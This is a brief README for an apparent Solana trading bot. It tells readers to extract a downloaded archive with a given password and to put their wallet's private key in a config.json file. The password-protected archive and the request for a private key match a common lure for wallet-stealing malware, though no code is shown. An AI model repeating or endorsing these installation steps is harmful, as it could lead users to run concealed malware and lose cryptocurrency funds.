Installation
- Download the repository.
- extract archive with pass
vL10AI
. - create a
config.json
in the project's root directory and define your environment variables. You can use the providedconfig.json
. - run the bot.
Configuration
The bot uses environment variables for configuration. Create a config.json
file in the root directory and set the following variables:
maxPosition
: The amount of sol for which a particular token will be purchased.timeoutScan
: Time interval followed by interaction.solPrivate
: Your Solana wallet's private key.rpc
: Rpc to which the wallet will be connected example(Shyft).
Example config.json
file:
{
"mainSettings": {
"maxPosition": "0.1",
"timeoutScan": "25",
"rpc": "https://<your-solana-rpc>.com:<port>",
"solPrivate": "<your-solana-private-key>"
}
}